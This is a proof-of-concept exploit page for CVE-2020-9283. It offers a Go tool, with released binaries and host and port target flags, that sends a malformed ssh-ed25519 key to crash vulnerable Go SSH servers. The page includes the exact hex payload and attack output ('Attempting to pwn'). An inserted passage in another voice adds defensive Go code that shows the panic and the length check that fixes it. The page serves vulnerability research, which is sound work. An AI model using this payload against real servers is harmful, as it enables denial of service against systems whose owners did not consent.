
CVE-2020-9283 PoC: Golang Go crypto data forgery vulnerability

Related vulnerability
Title: Golang Go crypto data forgery vulnerability (CVE-2020-9283)
Description: Golang Go crypto is a cryptographic code library based on the Go language from the Golang community. A data forgery vulnerability exists in the Golang SSH package (Go) in versions before v0.0.0-20200220183623-bac4c82f6975. An attacker can exploit this vulnerability to cause a denial of service.
Description: Exploit for CVE-2020-9283 based on Go
Introduction
# Exploit for CVE-2020-9283

This project is inspired by the original PoC found at github.com/mark-adams/exploits/CVE-2020-9283.
I was curious as to how the Go SSH library was implemented, so I decided to implement the PoC using Go.

A short writeup can be found here https://dev.to/brompwnie/modifying-go-s-crypto-ssh-library-for-cve-2020-9283-26a7

# What does this do?

This triggers a panic ('ed25519: bad public key length') on a Go-based SSH server built on the vulnerable Go crypto ssh package, which may lead to a DoS.

# Installation

I've released binaries in the Release section; however, you can rebuild your own from the attached source code.

## Building the sources
I decided to modify the Go crypto library directly on my system to understand how it works. This is not ideal and probably not the best way to do this, but it works ;) If you want to rebuild using Go modules, replace the contents of the crypto/ssh files client_auth.go, handshake.go and transport.go on your local system with the ".bak" files located here. These modified files contain verbose debugging output and a hardcoded payload of "0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161" which triggers the panic.
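The hardcoded payload above is an SSH wire-format public key blob: the algorithm name "ssh-ed25519" followed by a key field that is only 21 bytes long instead of 32. The Go program below is an added example, not code from this project or from the crypto/ssh library: it parses that blob, shows in-process (with recover) that handing the undersized key straight to crypto/ed25519.Verify panics, and applies the kind of length check the patched library performs before verification. The function names (readString, ParseED25519Blob, UnguardedVerifyPanics) are my own.

```go
package main

import (
	"crypto/ed25519"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

const payloadHex = "0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161" // README payload: "ssh-ed25519" name, 21 key bytes

// readString parses one SSH "string": a big-endian uint32 length, then that many bytes.
func readString(b []byte) (s, rest []byte, err error) {
	if len(b) < 4 || uint64(len(b)-4) < uint64(binary.BigEndian.Uint32(b)) {
		return nil, nil, fmt.Errorf("ssh: malformed string field")
	}
	n := binary.BigEndian.Uint32(b)
	return b[4 : 4+n], b[4+n:], nil
}

// ParseED25519Blob rejects a key field that is not exactly ed25519.PublicKeySize bytes before it can reach ed25519.Verify.
func ParseED25519Blob(blob []byte) (ed25519.PublicKey, error) {
	algo, rest, err := readString(blob)
	if err != nil || string(algo) != "ssh-ed25519" {
		return nil, fmt.Errorf("ssh: not a well-formed ssh-ed25519 key blob")
	}
	key, _, err := readString(rest)
	if err != nil {
		return nil, err
	}
	if l := len(key); l != ed25519.PublicKeySize {
		return nil, fmt.Errorf("ssh: invalid size %d for Ed25519 public key", l)
	}
	return ed25519.PublicKey(key), nil
}

// UnguardedVerifyPanics is the failure mode: crypto/ed25519.Verify panics on a wrong-sized key; recover() reports it instead of crashing.
func UnguardedVerifyPanics(key []byte) (panicked bool) {
	defer func() { panicked = recover() != nil }()
	ed25519.Verify(ed25519.PublicKey(key), []byte("msg"), make([]byte, ed25519.SignatureSize))
	return false
}

func main() {
	blob, _ := hex.DecodeString(payloadHex)
	_, rest, _ := readString(blob)
	key, _, _ := readString(rest)
	fmt.Println(ParseED25519Blob(blob))
	fmt.Println("unguarded Verify panics:", UnguardedVerifyPanics(key))
}
```

A server that validates the key length at parse time, as the fixed library does, turns the crash into an ordinary authentication error the client simply sees as a rejected login.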

# Usage
You will see lots of debugging output and "errors"; this is expected. If your target has panicked, you should see errors associated with "bad key lengths". If you want to test this locally, use the vulnerable code that can be found at github.com/mark-adams/exploits/CVE-2020-9283.

```
# ./CVE-2020-9283 -h
Usage of ./CVE-2020-9283:
  -host string
        IP address of SSH host to target (default "localhost")
  -key string
        ssh-ed25519 private key to use (default "thekey")
  -port string
        Port to target (default "22")

# ./CVE-2020-9283 -port=2022
./CVE-2020-9283 -port=2022
+] Sploit for CVE-2020-9283
[+] Attempting to pwn: localhost:2022
[!] Attempting: cMSG_USERAUTH_REQUEST
[+] userAuthRequestMsg User:  notme
[+] userAuthRequestMsg Service:  ssh-connection
[ERROR] ssh: handshake failed: EOF
[+] This should have invoked a panic on the SSH target i.e 'panic: ed25519: bad public key length'

```
File snapshot

```
[4.0K] /data/pocs/0a3142ae02d3b8a652d8b087e9e865f96738d61b
├── [ 20K] client_auth.go.bak
├── [8.7K] client.go.bak
├── [ 115] go.mod
├── [ 824] go.sum
├── [ 16K] handshake.go.bak
├── [1.7K] main.go
├── [1.5K] Makefile
├── [2.0K] README.md
└── [9.3K] transport.go.bak

0 directories, 9 files
```